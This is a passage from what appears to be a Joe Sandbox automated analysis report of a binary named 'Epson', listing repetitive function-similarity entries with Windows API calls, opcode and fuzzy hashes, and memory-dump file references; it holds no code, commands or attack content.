                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                      • Opcode ID: 12b3d57c39c935627520169bbb6f71d6f965cd83210a0a69a8d37616e7cbb4e5
                                                                                                                                                                                                                                      • Instruction ID: 0c094334fcb1c98323bd6e19303a60df535cea40b4f671fe58ddfbe9182dd39b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12b3d57c39c935627520169bbb6f71d6f965cd83210a0a69a8d37616e7cbb4e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0F43080020DF68B00BAA4EC029AE777C5F00320B90C027BA1C962A3FF74E615E582
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FD8D52
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00FD8D59
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00FD8F3A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                                                                                                      • Opcode ID: 93b6b9c58c74df0a9df1e32ff94ebc6fad33f5346736e9500f2af0f91885a380
                                                                                                                                                                                                                                      • Instruction ID: 5aee5d2a5e3e24ff3c6b320f3127882621b2e22132dcd684a6950f2266c295e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93b6b9c58c74df0a9df1e32ff94ebc6fad33f5346736e9500f2af0f91885a380
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7126D71A08341DFC714DF24C484B5ABBE6FF84364F08895EE8898B352CB75E946DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 306214811-0
                                                                                                                                                                                                                                      • Opcode ID: ccb891eccab9ecd1a502423fe1153cfe437eb6c84fdbb0d3a9e7619db9a89438
                                                                                                                                                                                                                                      • Instruction ID: c2c02166457455007e6b746d4232c169937769d6212f5b0585970b58fe9d6d01
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccb891eccab9ecd1a502423fe1153cfe437eb6c84fdbb0d3a9e7619db9a89438
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3A17C31604205DFCB18DF58C8D1969BBB2FF45314B2484AEE84A8F392CB75ED42EB80
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F532AF
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F532B7
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F532C2
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F532CD
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F532D5
                                                                                                                                                                                                                                        • Part of subcall function 00F5327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F532DD
                                                                                                                                                                                                                                        • Part of subcall function 00F53205: RegisterWindowMessageW.USER32(00000004,?,00F52964), ref: 00F5325D
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F52A0A
                                                                                                                                                                                                                                      • OleInitialize.OLE32 ref: 00F52A28
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00F93A0D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1986988660-0
                                                                                                                                                                                                                                      • Opcode ID: b1cbea631053896c2d1f34f672e3795c1c09e83acea628ad495e514579b5b276
                                                                                                                                                                                                                                      • Instruction ID: 3d79721d84c3f0e2e40947de0b0b1dd9cad126c6ab7ecf16611361551c5bd29b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1cbea631053896c2d1f34f672e3795c1c09e83acea628ad495e514579b5b276
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2071B2B0901260CFC3B8DFF9E9656153AF0BB483053A0822AE58AC735AEB7E4545EF54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F561A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F56299
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00F6FD36
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F6FD45
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FAFE33
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                                                                                                      • Opcode ID: fb2351d8f8b26315f18981a5f63cce0ad326ee3822ab2657ae633cd6f235af9c
                                                                                                                                                                                                                                      • Instruction ID: 00b39b111ab684864eb17751d584dff852df70372e73dda173675988ca168feb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb2351d8f8b26315f18981a5f63cce0ad326ee3822ab2657ae633cd6f235af9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 223198B1904344AFDB32CF64D895BE6BBECAF13314F10449ED5DA9B141C3741A89DB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00F8894C,?,01019CE8,0000000C), ref: 00F88A84
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00F8894C,?,01019CE8,0000000C), ref: 00F88A8E
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F88AB9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2583163307-0
                                                                                                                                                                                                                                      • Opcode ID: acd8edc88ba617e9d5a40325cfa7615108a025e4837fddd6d86eee844710b189
                                                                                                                                                                                                                                      • Instruction ID: f1abc02d7ddec21e90afd91a55008a5bd38cece61b76be0df021d163809089e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acd8edc88ba617e9d5a40325cfa7615108a025e4837fddd6d86eee844710b189
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40014832A051647BC6287674AC86BFE37494B81BB8FA5011AF8248B1C2DF3C98827380
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00F897BA,FF8BC369,00000000,00000002,00000000), ref: 00F89744
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00F897BA,FF8BC369,00000000,00000002,00000000,?,00F85ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00F76F41), ref: 00F8974E
                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00F89755
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                                                                                                      • Opcode ID: 797828f0d81612b9c90cbb01c0cd11082ee7658f27eeb89e229451ff5c929892
                                                                                                                                                                                                                                      • Instruction ID: 70ac574b5dca299dac298f7532c9149d73420647acd81a586a18d8e39ab0af98
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 797828f0d81612b9c90cbb01c0cd11082ee7658f27eeb89e229451ff5c929892
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34014C33A24118AFCB15AF99DC45CFE7B29DB85330B280219F8159B190EA71DD41BB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00F5F27B
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00F5F289
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F5F29F
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00F5F2B1
                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00FA32D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3288985973-0
                                                                                                                                                                                                                                      • Opcode ID: 8ce2611d31fcc30ddc3d4733b4f584ad11b2c60f99870a1d33a07a80c7fd8a36
                                                                                                                                                                                                                                      • Instruction ID: baba2ae6fcf73bbc41e026ca1c7044ee2324f6249c5790cb18a790de57237ce5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ce2611d31fcc30ddc3d4733b4f584ad11b2c60f99870a1d33a07a80c7fd8a36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8F05E716043889BE7348BA0CC89FDA73ACAB45311F104928F649870C0DB749588AB26
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00F63006
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                      • Opcode ID: 9fe171b1457619ab9c196750db026513a109980db683bd9b5a889c08d39c9ba7
                                                                                                                                                                                                                                      • Instruction ID: 81cf197efefa4883cfc17e85b2a7fec7131a7239b5ebf40bf3e2b7bc1fbcf2ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe171b1457619ab9c196750db026513a109980db683bd9b5a889c08d39c9ba7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A228AB1A08701DFC714DF24C880B2ABBF1BF95324F14895DF4898B2A1D776E945EB92
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f63678f39d6d4e1d9235bb57ebd8cd7cd72c47b57b1245febbc8084cfbdf3bfb
                                                                                                                                                                                                                                      • Instruction ID: bbb1e5b72a88f6d00a103dd6ca92b8359b0a2188b485ae172c91cf2348bdcf1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f63678f39d6d4e1d9235bb57ebd8cd7cd72c47b57b1245febbc8084cfbdf3bfb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7232DD71A00205DFCB24DF54CC81BAEB3B4FF06364F188519E915EB2A1EB79AD44EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00F9413B
                                                                                                                                                                                                                                        • Part of subcall function 00F55851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F555D1,?,?,00F94B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F55871
                                                                                                                                                                                                                                        • Part of subcall function 00F53A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F53A76
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                      • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                      • Opcode ID: 96d9d6b95947c4718a211f2eff8e3c93bb00c299abd7fc23d19b3024467637d0
                                                                                                                                                                                                                                      • Instruction ID: ed6348bf18939751d2e8afa74a83904d8c2b84b53a9aa4e48f54171e713c4933
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96d9d6b95947c4718a211f2eff8e3c93bb00c299abd7fc23d19b3024467637d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21A171A002589BDF119F98CC05BEE7BFCAF49311F008019E945A7241DBBC9A8D9FA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F53A3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                      • Opcode ID: a3cd46b1ec8836ec0fe6812fb6fab85be89797a5b3ee9799b5035e51d5ac9a60
                                                                                                                                                                                                                                      • Instruction ID: ebcf382bbf5befae0688e379821f669c19c6af80aebdc4f6ecfc89b1f9a70acb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3cd46b1ec8836ec0fe6812fb6fab85be89797a5b3ee9799b5035e51d5ac9a60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831B1B15047009FE331DF68D884B97BBE8FB48719F10092EEAD987240E775A948DB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 00F5333D
                                                                                                                                                                                                                                        • Part of subcall function 00F532E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F532FB
                                                                                                                                                                                                                                        • Part of subcall function 00F532E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F53312
                                                                                                                                                                                                                                        • Part of subcall function 00F5338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F53368,?), ref: 00F533BB
                                                                                                                                                                                                                                        • Part of subcall function 00F5338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F53368,?), ref: 00F533CE
                                                                                                                                                                                                                                        • Part of subcall function 00F5338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,01022418,01022400,?,?,?,?,?,?,00F53368,?), ref: 00F5343A
                                                                                                                                                                                                                                        • Part of subcall function 00F5338B: SetCurrentDirectoryW.KERNEL32(?,00000001,01022418,?,?,?,?,?,?,?,00F53368,?), ref: 00F534BB
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F53377
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1550534281-0
                                                                                                                                                                                                                                      • Opcode ID: 23be29f769cbdc1241159b43b5fddbefc041da6a3b5094d95e005c3c51193441
                                                                                                                                                                                                                                      • Instruction ID: 09218e6738b76e720e4d6c119f1b7055d74345ba2d32f7c7630c7e4a7cdfc4dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23be29f769cbdc1241159b43b5fddbefc041da6a3b5094d95e005c3c51193441
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F0B4315047449FD3306FA4EC0AB247790A70474AF608816FA48490D6CBBF8064AB00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00F5CEEE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                      • String ID:
